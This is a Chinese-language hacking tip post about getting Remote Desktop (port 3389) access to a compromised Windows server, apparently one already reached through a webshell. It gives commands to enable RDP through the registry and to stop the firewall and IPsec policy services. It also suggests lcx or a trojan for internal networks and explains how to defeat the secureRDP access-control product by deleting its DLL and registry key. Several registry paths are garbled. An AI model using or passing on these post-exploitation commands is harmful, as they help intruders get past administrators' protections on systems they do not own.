1、最经常出现的3389端口没开。
怎么看端口开没开呢。最简单的办法是netstat -an 查看是不是有127.0.0.1:3389有这行。如果有表示开已经开放了 木有的话就表示木有开放3389终端端口(PS:这样看的前提是管理员没有很贱的修改掉终端端口。)
第二种查看是基于命令行的。我很喜欢这种方式。
reg query "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWds
dpwdTds cp"
上个图
未命名1.jpg
大家主要注意倒数第二行就好了。 PortNumber REG_DWORD 0xd3d
大概意思就是终端端口为d3d (ps: 0xd3d前面的0x是16进制表示 d3d 经过16进制转换=3389)
这样在通过上面的方法就可以查看是否开启了终端端口了。
不过如果有webshell并支持各种组件直接读取注册表就行了。
解决办法:
dos下一句话开启3389,不用重启,测试过XP和2003…dos下一句话开启3389,不用重启,测试过XP和2003…
开启3389
REG
ADD HKLMSYSTEMCurrentControlSetControlTerminal" “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
查看远程终端
REG query HKLMSYSTEMCurrentControlSetControlTerminal” "ServerWinStationsRDP-Tcp /v PortNumber
2、IP策略和防火墙的阻拦(一般管理员都会设置下的。)
解决办法 :禁用服务
net stop sharedaccess
net stop policyagent
搞定
3、内网
内网只能lcx或者运行木马了。 个人比较我比较喜欢第二种。
4、其他各种软件各种防火墙控制
举个例子。前几天遇到的。
secureRDP防火墙 尼玛各种限制 连接3389甚至可以精确到限制主机名、ip、iP段、MAC地址等等。
突破secureRDP的方法。
删掉wtsfilter.dll 删掉注册表键值 HKEY_LOCAL_MACHINE/SOFTWARE/Terminalsoft/WTSFilter 或者ren改掉WTSFilter的名字
删除的方法:echo y | reg delete HKEY_LOCAL_MACHINESOFTWARETerminalsoftWTSFilter 这个方便直接 推荐
如何用CMD开启3389与查看3389端口
开启
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
查端口
REG query HKLMSYSTEMCurrentControlSetControlTerminal" "ServerWinStationsRDP-Tcp /v PortNumber